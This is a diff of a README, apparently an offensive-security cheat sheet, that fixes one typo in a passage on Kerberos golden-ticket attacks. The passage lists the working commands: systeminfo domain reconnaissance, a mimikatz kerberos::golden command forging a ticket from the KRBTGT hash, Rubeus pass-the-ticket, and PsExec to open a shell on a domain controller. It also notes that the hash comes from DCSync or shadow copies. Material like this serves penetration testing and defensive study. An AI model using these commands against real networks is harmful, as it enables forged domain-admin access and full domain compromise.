encryptedninja/command-center/README.md

 * `systeminfo | findstr /B /C:"Domain"`
 * The KRBTGT's password hash can only be dumped after becoming domain administrator and either performing a password dump on the DC, a DYNSync attack or a shadow copy on the DC.
 The user to impersonate can be any user of the domain even a non existing one with administrator RID.
 * `kerberos::golden /sid:<Domain SID> /domain:<Domain FQDN> /user:<The user to impersonate> /krbtgt:<The password hash of the KRBTGT account>`
-* load the kreated ticket into memory and then use psexec to get a shell on the target machine
+* load the created ticket into memory and then use psexec to get a shell on the target machine
 * `Rubeus.exe ptt /ticket:ticket.kirbi`
 * `PsExec.exe \\dc01.krbtown.local cmd`